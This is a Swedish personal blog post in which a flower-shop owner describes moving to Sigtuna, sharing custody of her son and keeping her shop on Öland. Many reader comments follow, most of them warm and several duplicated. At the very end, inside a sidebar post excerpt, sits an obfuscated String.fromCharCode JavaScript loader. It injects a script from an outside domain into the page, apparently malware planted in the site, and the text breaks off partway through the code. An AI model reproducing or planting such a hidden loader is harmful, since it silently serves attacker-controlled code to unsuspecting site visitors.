Nu börjar ett nytt kapitel i mitt liv. Vi har flyttat till Stockholm!

FullSizeRender 39

Godmorgon!

Nu sitter jag och njuter utav en förmiddagskaffe i min och Ludvigs nya lägenhet. Förlåt för dåliga uppdateringar, men jag är mitt i ett flyttkaos, med allt vad det innebär!

Jag har flyttat från Öland/Kalmar till Stockholm, eller rättare sagt Sigtuna. Lång historia kort.

I veckan har jag packat, rensat och organiserat till 02-03 varje natt, sovit ett par timmar och sedan åkt till My’s Blommor. Min underbara kollega och vän Vickan hjälpte mig med dom tunga grejerna i torsdags.

-TACK ÄLSKADE DU <3

FullSizeRender 38

 

FullSizeRender 37 IMG_9232

 

Jag körde lastbil upp till Sigtuna. Skakis i kroppen, trött i knoppen men med en BRA magkänsla! Bättre än på många år.

 Hannah och lilla Vida kom förbi med inflyttningspresent och vi tog en premiärfika i solen. Hannah insåg ganska snabbt att jag behöver hjälp med alla tunga möbler så hon ringde in sin man, peter. -TACK  

IMG_9186

Tusen tack för hjälpen <3

IMG_9202

Efter några timmar till kom Maggan pyret och Mikaela, Herman och Hanna också förbi… Perfekt med kaffepaus mellan allt springande mellan lastbil och lägenhet.

Nu till frågorna: Varför? Hur ska det bli med Lilleman?
Vad händer med butiken My’s Blommor?  

IMG_9200 2

IMG_9189

  Nu ska jag försöka att göra en lång historia kort. Vilket jag inte är bra på, men jag ska försöka.

Vissa av er är nya här inne andra känner till en del av min historik. Oavsett vad så får ni fråga vad ni vill så ska jag försöka att svara så gott jag kan.

Till att börja med så kan jag berätta att jag INTE är ifrån Öland ifrån början. Jag träffade Lillemans pappa och stannade kvar där. Jag har ingen familj eller någon bakup där nere.Jag har under flera år känt mig väldigt ensam och rotlös.

När Lilleman var några veckor gammal och hans pappas otrohet var ett faktum då en annan kvinna var gravid och väntade hans barn, dvs Ludvigs numera lillebror. Så blev livet blev kaos, på alla plan. Det är en historia i sig och den håller vi utanför bloggen.

Men från den dagen så har jag velat flytta ifrån Öland. Jag har under dessa fyra år våndats utav ångest och vantrivts något fruktansvärt utav diverse olika anledningar. Trakasserier, (på en brottslig nivå) privata bekymmer och den normala ”problematiken” som hör alla separationer till.

 Nu ÄNTLIGEN har drömmen blivit verklighet!

Jag har letat lägenhet länge nu. Inne i stan, Vasastan, Södermalm, Kungsholmen. m.m. Men jag valde Sigtuna framför stan. Vi kommer att ha Lilleman varannan  vecka.

Jag kommer ta morgonflyget från Arlanda ner till Kalmar och lämna/hämta lilleman på Måndagarna. Detta är någonting som jag och hans pappa är helt överens om, och vi båda ser självklart till Ludvigs bästa! 

_MG_0326 kopia

Jag var och besökte Lillemans nya dagis Kids 2 home i fredags. Jag säger bara -WOW! Lilleman kommer att älska detta, personalen, miljön, och hela upplägget! Mer om det i ett senare inlägg.

Här i Sigtuna har vi gångavstånd till dagis, stranden, lekplatsen, naturen och allt känns så mycket mer rätt än att ta med Ludvig ifrån Öland och placera honom mitt i Stockholms Centrala innerstad.

Mitt mamma hjärta jublar över lyckan att äntligen få må bra inifrån och ut.
_MG_0323 kopia

Jag vet att många av er kommer att ha olika åsikter kring detta.Det är helt okay.

Lilleman har redan innan flytt ett umgänge här i Sigtuna, Hannah & Peter och deras barn . Angela, Mikaela och halva bålsta gänget som vi senaste åren firat, midsommar, nyår, födelsedagar osv med. Han kommer att skolas in på dagis samtidigt som Mikaelas son Gustav. Detta kommer att bli så otroligt bra. Det blir inte en lika stor kontrast för Lilleman mellan Sigtuna/Öland som mellan Öland/stockholm innerstad.

-Lycklig mamma, lyckliga barn <3

_MG_0316 kopia

Det är inte bara mitt ego som har talat, jag har dessutom tjänster inom bloggen som från årsskiftet kräver mer jobb stationerat här uppe i stan än tvärt om.

Jag behöver rent affärsmässigt att ha min bas härifrån för att kunna drifta bolagen på bästa sätt. Jag startade My’s Blommor som 18åring. Jag har lagt nio år på min underbara butik, det är min bebis. Jag kommer INTE att sälja eller lämna över butiken på någon annan.

Jag kommer att jobba på plats regelbundet vissa dagar i veckan. Men jag kommer att lyfta mig ifrån ”golvet” och jobba mer bakifrån, med inköp, fakturering, schemaläggning, marknadsföring osv. Tiden som inte räcker till för att vidare utveckla My’s Blommor kommer genom flyttan att bli möjlig. Igår var jag på inköp här i Sthlm, så inom kort dyker det upp ytterligare tre nya leverantörer tex.

 Självklart kommer de tag vara en mental utmaning för mig att deligera ut mer jobb då jag ”är van att göra allting själv” Men jag ser fram emot även denna utvecklingen som kommer att göra mig och företaget gott i längden. 

Oavsett vad så är jag så sjukt glad över detta. Jag ser ljust på framtiden. Jag har hittat hem <3

Nu ska jag återgå till flyttorganiseringen. Jag kommer ha dubbla lägenheter ett par veckor, så du kommer få hänga med i den svängen också 😉

Många Kramar en lycklig  My.  

Sneek peak från nya lyan: 

IMG_9228

FullSizeRender 36

IMG_9229

Jag har tagit med i stort sett allt utan sängen och lite kläder… Jag ser så mycket fram emot första natten i lägenheten =)Men snart så!

PS: TACK Maggan & Filip för dessa åren … -Nu flyttat tonårs dottern ut 😉

160 Komentarer

 1. Hej, kan bara komma med gratulationer och inga negativa kommentarer om detta. Ni bestämmer själva över era liv, ingen annan ska bestämma över det. Självklart har ni sonens bästa för era ögon, du och lillens pappa. Ibland är det bra att rycka upp rötterna och ta nya tag, absolut. Sigtuna ser himla mysigt ut av vad jag sett. Lycka till nu och hoppas hösten är början på nåt positivt!

 2. Detta är bara beundransvärt, det du gör nu! Du gör nåt åt din situation, det är det inte alla som vågar (det är kanske de som kritiserar dig mest) . Lycka till! Kram Annika

  • Det är just det Annika, att man KAN göra någonting åt situationen. Man ska inte låsa fast sig vid tanken att det inte går, utan istället föröka se möjligheterna och lösa problemen ett efter ett =) Kram <3

 3. Stort lycka till. Jag flyttade själv från en del av Sverige till en helt annan del och det är ett av mina bästa beslut. Men barnen stnna de hos mig och åkte till pappan på helgerna. Men vad händer när det är dags för skola? Och att vara på två olika dagis varannan vecka är inte en bra lösning. Er son kommer tappa på båda ställena. Bättre att han bor på ett ställe. Antingen Sigtuna eller Öland.

  • Varför skulle han må dåligt av att vara på två dagis? Tror snarare han får mer än tappar som du skriver. Han får kärlek från två ställen, upplevelser från två, vänner från två. Och dessutom två lyckliga föräldrar som älskar honom. Hur kan det vara fel?

   • Fel sa hon väl inte… MEN tänk dig själv och jobba på två arbeten, varannan vecka. Utbildningar, julfester och andra roligheter ligger på ”fel” veckor och du missar att vara med. Sedan kan det säkert också finnas bra sidor med det att vara på två ställen, men att senare hänga med i skolan på två ställen då de kanske inte ens använder samma böcker, ligger på samma sidor eller har samma pedagogik. De har ju några år på sig att fundera över hur det blir i skolan sedan. Lycka till med ditt boende och nära och kära My.

  • När det är dags för skola så löser dem det jättebra. Tror inte du behöver oroa dig. Och två olika förskolor behöver verkligen inte betyda problem. På den förskolan jag arbetar har vi ett barn som ena veckan är i en stad och nästa en annan. Gladare unge kan man nog inte hitta;) Så lycka till My med ditt nya boende.

 4. Lycka Till o hoppas detta blir en positiv riktning för er ,att må bra inombords e jätte viktigt , tråkigt för många av oss på Ön , hoppas du e i butiken någon ggn ,då man knallar in , ska fråga efter dig varje ggn , jag lovar, försök ändå i allt stök ,ta det lite lugnt

  • hihi! Goa, fina Martina =) Jag kommer alltid att vara inne måndagar, beställningar, omskyltning, veckomöten, osv.. plus varannan tisdag =) Dessutom extra under högsäsong, och alla ”högtids dagar” Stor kram <3

 5. Hej!
  Driftig, modig och framför allt ödmjuk <3
  Lycka till med nya lyan och dina framtida planer.
  Kram
  Ps. Ljuslyktorna, var är de ifrån? Så fint sken ifrån dem så de måste flytta in ett par här.

 6. Så härligt att höra att du följer ditt hjärta. Det är väl det livet går ut på..att må så bra som möjligt!!
  Självklart att du även tänker på Ludvigs bästa, skulle aldrig tro nåt annat!!<3
  Nya lägenheten ser fantastisk ut…o med din läckra smak!! Ser fram emot fler bilder:-) Lycka till med nya livet!

 7. Grattis och lycka till! Jag och min särbo bor bara 3 mil från varandra men får inte ihop boendet med barn ändå.
  Jag är lite nyfiken på hur ni har tänkt med Lilleman när det är dags att börja skolan. Vart ska han bo då?
  Fortsätt att skriva din blogg som du gör, det är alltid roligt att gå in här och läsa.

 8. Lycka till med allt! Och de som har åsikter om andras livsval får mer än gärna behålla dem för sig själva ? Det är ditt liv och det är du som ska leva det, så lev det lyckligt! <3

 9. Hej, kan bara komma med gratulationer och inga negativa kommentarer om detta. Ni bestämmer själva över era liv, ingen annan ska bestämma över det. Självklart har ni sonens bästa för era ögon, du och lillens pappa. Ibland är det bra att rycka upp rötterna och ta nya tag, absolut. Sigtuna ser himla mysigt ut av vad jag sett. Lycka till nu och hoppas hösten är början på nåt positivt!

 10. Detta är bara beundransvärt, det du gör nu! Du gör nåt åt din situation, det är det inte alla som vågar (det är kanske de som kritiserar dig mest) . Lycka till! Kram Annika

  • Det är just det Annika, att man KAN göra någonting åt situationen. Man ska inte låsa fast sig vid tanken att det inte går, utan istället föröka se möjligheterna och lösa problemen ett efter ett =) Kram <3

 11. Jösses vilken energi du har.
  Även om jag inte kan speciellt mycket om att driva butik, vara mamma, driva blogg, modella etc så är jag imponerad över hur mycket du hinner med på dygnets 24 timmar.
  Eller är det möjligtvis så att du har fler timmar än 24 att disponera varje dygn? ?

 12. Stort lycka till. Jag flyttade själv från en del av Sverige till en helt annan del och det är ett av mina bästa beslut. Men barnen stnna de hos mig och åkte till pappan på helgerna. Men vad händer när det är dags för skola? Och att vara på två olika dagis varannan vecka är inte en bra lösning. Er son kommer tappa på båda ställena. Bättre att han bor på ett ställe. Antingen Sigtuna eller Öland.

  • Varför skulle han må dåligt av att vara på två dagis? Tror snarare han får mer än tappar som du skriver. Han får kärlek från två ställen, upplevelser från två, vänner från två. Och dessutom två lyckliga föräldrar som älskar honom. Hur kan det vara fel?

   • Fel sa hon väl inte… MEN tänk dig själv och jobba på två arbeten, varannan vecka. Utbildningar, julfester och andra roligheter ligger på ”fel” veckor och du missar att vara med. Sedan kan det säkert också finnas bra sidor med det att vara på två ställen, men att senare hänga med i skolan på två ställen då de kanske inte ens använder samma böcker, ligger på samma sidor eller har samma pedagogik. De har ju några år på sig att fundera över hur det blir i skolan sedan. Lycka till med ditt boende och nära och kära My.

  • När det är dags för skola så löser dem det jättebra. Tror inte du behöver oroa dig. Och två olika förskolor behöver verkligen inte betyda problem. På den förskolan jag arbetar har vi ett barn som ena veckan är i en stad och nästa en annan. Gladare unge kan man nog inte hitta;) Så lycka till My med ditt nya boende.

 13. Lycka Till o hoppas detta blir en positiv riktning för er ,att må bra inombords e jätte viktigt , tråkigt för många av oss på Ön , hoppas du e i butiken någon ggn ,då man knallar in , ska fråga efter dig varje ggn , jag lovar, försök ändå i allt stök ,ta det lite lugnt

  • hihi! Goa, fina Martina =) Jag kommer alltid att vara inne måndagar, beställningar, omskyltning, veckomöten, osv.. plus varannan tisdag =) Dessutom extra under högsäsong, och alla ”högtids dagar” Stor kram <3

 14. Hej!

  Driftig, modig och framför allt ödmjuk <3
  Lycka till med nya lyan och dina framtida planer.

  Kram

  Ps. Ljuslyktorna, var är de ifrån? Så fint sken ifrån dem så de måste flytta in ett par här.

 15. Så härligt att höra att du följer ditt hjärta. Det är väl det livet går ut på..att må så bra som möjligt!!
  Självklart att du även tänker på Ludvigs bästa, skulle aldrig tro nåt annat!!<3
  Nya lägenheten ser fantastisk ut…o med din läckra smak!! Ser fram emot fler bilder:-) Lycka till med nya livet!

 16. Grattis och lycka till! Jag och min särbo bor bara 3 mil från varandra men får inte ihop boendet med barn ändå.
  Jag är lite nyfiken på hur ni har tänkt med Lilleman när det är dags att börja skolan. Vart ska han bo då?
  Fortsätt att skriva din blogg som du gör, det är alltid roligt att gå in här och läsa.

 17. Grattis och stort Lycka Till i nya staden och bostaden, My !!!! ?
  Underbart att du vågar lyssna till din magkänsla och satsa på det.
  Man ångrar ju oftast sånt i livet som man INTE gjort…så..Go for it girl! Det kommer säkert att bli toppen för dig och din son ?
  Kram ?

 18. Önskar dig ett stort lycka till, så modigt av dig, blir säkert alldeles utmärkt tror jag med allt. Fina vänner verkar du ha runt dig. Allt gott, kram siv

 19. Dem jag inspireras av brukar vara äldre än mig,jag är 44 och bor i London.Men varje gång jag går in och läser din blogg så tänker jag Wow!Vilken brud. Du är skitbra! Lycka till i storstaden men akta dig för killarna som bara vill en sak.Du är värd mer än det.Kram

 20. Lycka till med allt! Och de som har åsikter om andras livsval får mer än gärna behålla dem för sig själva 😉 Det är ditt liv och det är du som ska leva det, så lev det lyckligt! <3

 21. Jösses vilken energi du har.

  Även om jag inte kan speciellt mycket om att driva butik, vara mamma, driva blogg, modella etc så är jag imponerad över hur mycket du hinner med på dygnets 24 timmar.
  Eller är det möjligtvis så att du har fler timmar än 24 att disponera varje dygn? 😉

    • Kinna? VAD är din fråga? Förstår inte? NÄR var jag utomlands på en privat resa senast? Vi har gemensam vårdnad och har tagit ett gemensamt beslut! Ludvig är iof med på Bode jobb och privat resor…

     • Oj,oj, jag menade inget illa. Tvärt om så beundrar jag dig för din framåtanda och att du redan har kommit så långt i livet.
      Du har ju den senaste tiden försökt att dela dig mellan Stockholm o Öland och eftersom jag vet att du har hund, så trodde jag att kanske du och din ex. hade delat vårdnad om den också. Inte ovanligt faktiskt. Många gånger kan det vara svårt för barnet att varannan vecka, vara ifrån sin ” bästa vän ” Bra lösning.
      Lycka till i framtiden modiga kvinna,

 22. Välkommen till härliga Sigtuna.
  Hoppas du kommer o trivas.
  Önskar jag hade hälften av din drivkraft och energi.
  Lycka till med allt.
  Hoppas man ser dig på ”stan”

 23. Grattis och stort Lycka Till i nya staden och bostaden, My !!!! 🙂
  Underbart att du vågar lyssna till din magkänsla och satsa på det.
  Man ångrar ju oftast sånt i livet som man INTE gjort…så..Go for it girl! Det kommer säkert att bli toppen för dig och din son 🙂

  Kram 🙂

 24. Önskar dig ett stort lycka till, så modigt av dig, blir säkert alldeles utmärkt tror jag med allt. Fina vänner verkar du ha runt dig. Allt gott, kram siv

 25. Dem jag inspireras av brukar vara äldre än mig,jag är 44 och bor i London.Men varje gång jag går in och läser din blogg så tänker jag Wow!Vilken brud. Du är skitbra! Lycka till i storstaden men akta dig för killarna som bara vill en sak.Du är värd mer än det.Kram

 26. Stort lycka till, My!
  Har följt dig sen ensam mamma söker och tycker du är toppen och en drivande tjej! Älskar din blogg och läser varje dag. Bor i Bromma, men var nere på Öland och var då in på Mys blommor men tyvärr var du inte där, så fin butik! Köpte fina lyktor bl a!
  Hoppas du håller oss uppdaterade om nya livet i Sigtuna och hur det går för Lilleman på två förskolor! Kommer gå jättebra.
  PS: När jag var i Sigtuna besökte jag Tant Brun, de har så gott fika bakat på plats!
  Kram Sofie

 27. Åh va roligt, härligt att du vågar o följer din magkänsla..Det kommer garanterat funka utmärkt, och du verkar vara en tjej med skinn på näsan och inte vara rädd för något…
  Våga och vinn…
  Stort varmt lycka till //Höstkram fr mig

    • Kinna? VAD är din fråga? Förstår inte? NÄR var jag utomlands på en privat resa senast? Vi har gemensam vårdnad och har tagit ett gemensamt beslut! Ludvig är iof med på Bode jobb och privat resor…

     • Oj,oj, jag menade inget illa. Tvärt om så beundrar jag dig för din framåtanda och att du redan har kommit så långt i livet.
      Du har ju den senaste tiden försökt att dela dig mellan Stockholm o Öland och eftersom jag vet att du har hund, så trodde jag att kanske du och din ex. hade delat vårdnad om den också. Inte ovanligt faktiskt. Många gånger kan det vara svårt för barnet att varannan vecka, vara ifrån sin ” bästa vän ” Bra lösning.
      Lycka till i framtiden modiga kvinna,

 28. Välkommen till härliga Sigtuna.
  Hoppas du kommer o trivas.
  Önskar jag hade hälften av din drivkraft och energi.
  Lycka till med allt.
  Hoppas man ser dig på ”stan”

 29. Stort lycka till, My!
  Har följt dig sen ensam mamma söker och tycker du är toppen och en drivande tjej! Älskar din blogg och läser varje dag. Bor i Bromma, men var nere på Öland och var då in på Mys blommor men tyvärr var du inte där, så fin butik! Köpte fina lyktor bl a!
  Hoppas du håller oss uppdaterade om nya livet i Sigtuna och hur det går för Lilleman på två förskolor! Kommer gå jättebra.

  PS: När jag var i Sigtuna besökte jag Tant Brun, de har så gott fika bakat på plats!

  Kram Sofie

 30. Undra vart min tidigare kommentar tog vägen?!
  Hur som haver…
  Va roligt!! Stockholm är en vacker stad, verkligen!
  Grattis och lycka till!!

 31. Åh va roligt, härligt att du vågar o följer din magkänsla..Det kommer garanterat funka utmärkt, och du verkar vara en tjej med skinn på näsan och inte vara rädd för något…
  Våga och vinn…

  Stort varmt lycka till //Höstkram fr mig

 32. Grattis!! Vad härligt att läsa att du är lycklig och äntligen har hittat hem! 🙂 Det kommer bli hur bra som helst det här! Kram

 33. Precis som många andra skrivit så är det mycket beundransvärt att du tar tag i det o lyssnar på magkänslan, helt övertygad om att du kommer stortrivas i Sigtuna ? All lycka till dig o Lilleman!

 34. Vad härligt att läsa! För mig behöver du inte förklara dig alls varför du flyttar. Alla vet att som förälder så gör man allt i sin makt för att barnen ska må bra. Som du skrev också-lycklig mamma=lyckliga barn! Jag känner bara glädje med dig,kul att det blir som du vill och jag hoppas innerligt att du kommer trivas och må bra,du verkar som en härlig tjej och förtjänar det bästa! Många kramar till dig!

 35. Lycka till för er igen.
  Att känna rotlöshet är inte roligt, tomhet och kanske inte smärta och sökande. Så här jag känt då mina föräldrar kom till Sve på 70- talet från Finland. Nära till all släkt, kan inte klaga på det. Varje sommar härliga tider på mormors gård. När min pappa dog 1993 i en drunknigsolycka så visste vi inte vart han hade velat begravas men det ordnade sig. Jag bor i Stockholm nu, efter Köping ( uppväxt), Västerås ,( pluggat) och jobbade ett år i Saudi som sjuksköterska på ett sjukhus. Förespråkar inte deras religion . Men där en kväll i öknen, Vi satt på en filt och det hade börjat mörkna. Man såg stjärnorna. En stillhet i mig som jag aldrig upplevt. Minns det som igår. Trevliga kollegor från över hela världen.
  Men om jag stannar i Sthlm vet ej, när jag blev sjuk i min reumatiska sjukdom hade jag inte mina barndomsvänner här, en del party vänner men dom försvann ganska snabbt! Man får leta runt lite som för min del är att finna frid inom mig. Hoppas du kommer trivas , det tror jag då tycks ha starka band till människor här. Jag är imponerad Hur du klarat av dina svårigheter du mött och är en aktiv, företagsam kvinna.

 36. Undra vart min tidigare kommentar tog vägen?!
  Hur som haver…

  Va roligt!! Stockholm är en vacker stad, verkligen!
  Grattis och lycka till!!

 37. Så spännande och ska bli jättekul och följa ditt/erat nya liv i Sigtuna! Måste fråga vart du har köpt ljuslyktorna? OJ, va fina dom var = D!!!

 38. Precis som många andra skrivit så är det mycket beundransvärt att du tar tag i det o lyssnar på magkänslan, helt övertygad om att du kommer stortrivas i Sigtuna 🙂 All lycka till dig o Lilleman!

 39. Guuud vad spännande! Du är så cool som vågar göra det som många bara fantiserar om! Ska bli kul att få följa din resa bland barn,vänner, blommor m.m. oavsett vart du befinner dig. Du inspirerar! Lycka till med flytten! Kram! /Linda

 40. Vad härligt att läsa! För mig behöver du inte förklara dig alls varför du flyttar. Alla vet att som förälder så gör man allt i sin makt för att barnen ska må bra. Som du skrev också-lycklig mamma=lyckliga barn! Jag känner bara glädje med dig,kul att det blir som du vill och jag hoppas innerligt att du kommer trivas och må bra,du verkar som en härlig tjej och förtjänar det bästa! Många kramar till dig!

 41. Lycka till för er igen.
  Att känna rotlöshet är inte roligt, tomhet och kanske inte smärta och sökande. Så här jag känt då mina föräldrar kom till Sve på 70- talet från Finland. Nära till all släkt, kan inte klaga på det. Varje sommar härliga tider på mormors gård. När min pappa dog 1993 i en drunknigsolycka så visste vi inte vart han hade velat begravas men det ordnade sig. Jag bor i Stockholm nu, efter Köping ( uppväxt), Västerås ,( pluggat) och jobbade ett år i Saudi som sjuksköterska på ett sjukhus. Förespråkar inte deras religion . Men där en kväll i öknen, Vi satt på en filt och det hade börjat mörkna. Man såg stjärnorna. En stillhet i mig som jag aldrig upplevt. Minns det som igår. Trevliga kollegor från över hela världen.
  Men om jag stannar i Sthlm vet ej, när jag blev sjuk i min reumatiska sjukdom hade jag inte mina barndomsvänner här, en del party vänner men dom försvann ganska snabbt! Man får leta runt lite som för min del är att finna frid inom mig. Hoppas du kommer trivas , det tror jag då tycks ha starka band till människor här. Jag är imponerad Hur du klarat av dina svårigheter du mött och är en aktiv, företagsam kvinna.

 42. Så spännande och ska bli jättekul och följa ditt/erat nya liv i Sigtuna! Måste fråga vart du har köpt ljuslyktorna? OJ, va fina dom var = D!!!

 43. Guuud vad spännande! Du är så cool som vågar göra det som många bara fantiserar om! Ska bli kul att få följa din resa bland barn,vänner, blommor m.m. oavsett vart du befinner dig. Du inspirerar! Lycka till med flytten! Kram! /Linda

 44. Stor grattis och lycka till för dig och din son! Jag hoppas att alla dina förväntningar uppfylla sig och det blir så himla bra som det låter! Synd att vi tappa dig här nere men stort respekt att du går din väg! Kram

 45. Stor grattis och lycka till för dig och din son! Jag hoppas att alla dina förväntningar uppfylla sig och det blir så himla bra som det låter! Synd att vi tappa dig här nere men stort respekt att du går din väg! Kram

 46. Vad spännande med en ”omstart” i livet! Har själv gjort det och det blev så bra:-) STORT Lycka till med nya lägenheten och livet. KRAM Helene

 47. Hej My! Hur gör ni när lilleman börjar skolan? Ska han gå varannan vecka då också eller behöver han vara stationerad på en ort? Kram finaste My❤️

 48. Jag är grymt imponerad av dig! Att du tar ditt ”pick o pack” och flyttar, att du gör det själv, att du vågar, att du gör det! Som företagare, mamma och som människa så har man tusen olika beslut att ta. Speciellt när man gått genom jobbiga grejer. Fördelar o nackdelar, jag VET att du gör det för -till ditt/Lillemans bästa! Att du hittar lösningar. Jag önskar jag vore lite mer som du! Grymt imponerad av dig! Stort lycka till!

 49. Vad spännande med en ”omstart” i livet! Har själv gjort det och det blev så bra:-) STORT Lycka till med nya lägenheten och livet. KRAM Helene

 50. Många kan inte bo kvar på landsbygden o flyttar därför in till städer. Det finns nog för o nackdelar med allt! Du har ju lyckats bra hittils i livet-med det praktiska iaf. Startat eget. Jag tycker varken det är jättebra eller dåligt att du flyttar. Ditt val rätt o slätt. Det är nog inte bara platsen vi befinner oss på som avgör våra liv. Vi har ju bara ett. Jag lider av mycket ångest och oro i kroppen o knoppen. Ibland negativa tankar. Mycket ältande om vad som är rätt liv att leva. Äter mediciner mot det. Jag har pausat studier till fsk pedagog och har vikarierat på en mängd fsk. 99% har varit bra ställen. Bra, stabila vuxna människor. Men ibland gnäll bland personal. Men det är klart vissa dagar har man mycket i sig själv som snurrar runt å det kan leda till negativitet som gnäll o inte vara 100%igt närvarande. Jag värdesätter barn väldigt mycket men tror att om jag arbetar med min psykiska problematik så kommer jag förstå att släppa allt som tynger mig o älska mitt arbete utan gränser- jag måste dock bromsa mig lite i mitt engagemang för barn för jag vill inte bränna alla säkringar. Det finns så mycket att arbeta med på en förskola. Vi människor har så mycket vi kan utveckla inom oss. Jag tycker inte du ska arbeta ut dig som människa utan våga bara låta livet ha sin gång. Det är mycket som vi överhuvudtaget intr kan påverka- men vi kan vara nöjda ändå och släppa stressen det innebär att hitta lösningar på allt. Vi kan alltid göra mer, överallt. Hela tiden. Men vi måste ta hänsyn till att vi är människor o inte robotar. Mycket är dåligt med att vara människa- ångest, trötthet, värdelöshetskänslor, upplevd fulhet, skuldkänslor. Men nu är vi här. Låt oss göra en fin upplevelse av det hela! Lycka till med flytten!

 51. Hej My! Hur gör ni när lilleman börjar skolan? Ska han gå varannan vecka då också eller behöver han vara stationerad på en ort? Kram finaste My❤️

 52. Jag är grymt imponerad av dig! Att du tar ditt ”pick o pack” och flyttar, att du gör det själv, att du vågar, att du gör det! Som företagare, mamma och som människa så har man tusen olika beslut att ta. Speciellt när man gått genom jobbiga grejer. Fördelar o nackdelar, jag VET att du gör det för -till ditt/Lillemans bästa! Att du hittar lösningar. Jag önskar jag vore lite mer som du! Grymt imponerad av dig! Stort lycka till!

 53. Många kan inte bo kvar på landsbygden o flyttar därför in till städer. Det finns nog för o nackdelar med allt! Du har ju lyckats bra hittils i livet-med det praktiska iaf. Startat eget. Jag tycker varken det är jättebra eller dåligt att du flyttar. Ditt val rätt o slätt. Det är nog inte bara platsen vi befinner oss på som avgör våra liv. Vi har ju bara ett. Jag lider av mycket ångest och oro i kroppen o knoppen. Ibland negativa tankar. Mycket ältande om vad som är rätt liv att leva. Äter mediciner mot det. Jag har pausat studier till fsk pedagog och har vikarierat på en mängd fsk. 99% har varit bra ställen. Bra, stabila vuxna människor. Men ibland gnäll bland personal. Men det är klart vissa dagar har man mycket i sig själv som snurrar runt å det kan leda till negativitet som gnäll o inte vara 100%igt närvarande. Jag värdesätter barn väldigt mycket men tror att om jag arbetar med min psykiska problematik så kommer jag förstå att släppa allt som tynger mig o älska mitt arbete utan gränser- jag måste dock bromsa mig lite i mitt engagemang för barn för jag vill inte bränna alla säkringar. Det finns så mycket att arbeta med på en förskola. Vi människor har så mycket vi kan utveckla inom oss. Jag tycker inte du ska arbeta ut dig som människa utan våga bara låta livet ha sin gång. Det är mycket som vi överhuvudtaget intr kan påverka- men vi kan vara nöjda ändå och släppa stressen det innebär att hitta lösningar på allt. Vi kan alltid göra mer, överallt. Hela tiden. Men vi måste ta hänsyn till att vi är människor o inte robotar. Mycket är dåligt med att vara människa- ångest, trötthet, värdelöshetskänslor, upplevd fulhet, skuldkänslor. Men nu är vi här. Låt oss göra en fin upplevelse av det hela! Lycka till med flytten!

 54. Lycka till i Sigtuna!
  Har varit där många gånger, det är en fantastisk fin stad. På sommaren är det så vackert .Det kommer bli så bra.
  Kram

 55. Åh vad roligt! Grattis och lycka till! ?
  Men är det bara jag som reagerade på att hon skrev ”Vi kommer att ha Lilleman varannan vecka”
  I så fall grattis till det med ? <3
  KRAM

 56. Lycka till i Sigtuna!
  Har varit där många gånger, det är en fantastisk fin stad. På sommaren är det så vackert .Det kommer bli så bra.
  Kram

 57. Åh vad roligt! Grattis och lycka till! 😀
  Men är det bara jag som reagerade på att hon skrev ”Vi kommer att ha Lilleman varannan vecka”
  I så fall grattis till det med 😀 <3
  KRAM

 58. Hej och välkommen till kommunen. Bra val ?
  Bor oxå här sen 10 år tebaks och vill aldrig flytta härifrån.
  Tvärsäker på att du och Lilleman kommer att stormtrivas.
  Ha´de gott.
  Kram

 59. Hej och välkommen till kommunen. Bra val 😉
  Bor oxå här sen 10 år tebaks och vill aldrig flytta härifrån.
  Tvärsäker på att du och Lilleman kommer att stormtrivas.
  Ha´de gott.
  Kram

 60. Åh jag hade missat det här. Stort grattis till boendet!! vad modig du är. Själv står jag inför ett boendealternativ själv men vågar inte ta steget av flera anledningar. Men det är vad jag har velat i 3 år, men nu när jag har det framför mig så vågar jag bara inte. larvigt och tärande. Barnen mår bäst HÄR och jag mår bäst DÄR. Vad gör man!!! ????
  Ha en fin dag och grattis till nya boende. Är också nyfiken på hur ni löser skolan men det kommer nog sen, det är ju liksom ett tag kvar. ?
  KRAM!!!

 61. Åh jag hade missat det här. Stort grattis till boendet!! vad modig du är. Själv står jag inför ett boendealternativ själv men vågar inte ta steget av flera anledningar. Men det är vad jag har velat i 3 år, men nu när jag har det framför mig så vågar jag bara inte. larvigt och tärande. Barnen mår bäst HÄR och jag mår bäst DÄR. Vad gör man!!! ????

  Ha en fin dag och grattis till nya boende. Är också nyfiken på hur ni löser skolan men det kommer nog sen, det är ju liksom ett tag kvar. 😀
  KRAM!!!

 62. You go girl! Härliga My ditt mod, din styrka & att du faktiskt vägar & gör val många spenderar en hel livstil att vela över. Ska göra som du & vågamer & framför allt våga välja att följa mitt hjärta. För nånstans på vägen så ordnar det ju sig. Det går om man kämpar & ger sitt hjärta. Jag tror att du är nått stort på spåren My, kör hårt ?

 63. You go girl! Härliga My ditt mod, din styrka & att du faktiskt vägar & gör val många spenderar en hel livstil att vela över. Ska göra som du & vågamer & framför allt våga välja att följa mitt hjärta. För nånstans på vägen så ordnar det ju sig. Det går om man kämpar & ger sitt hjärta. Jag tror att du är nått stort på spåren My, kör hårt 🙂

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40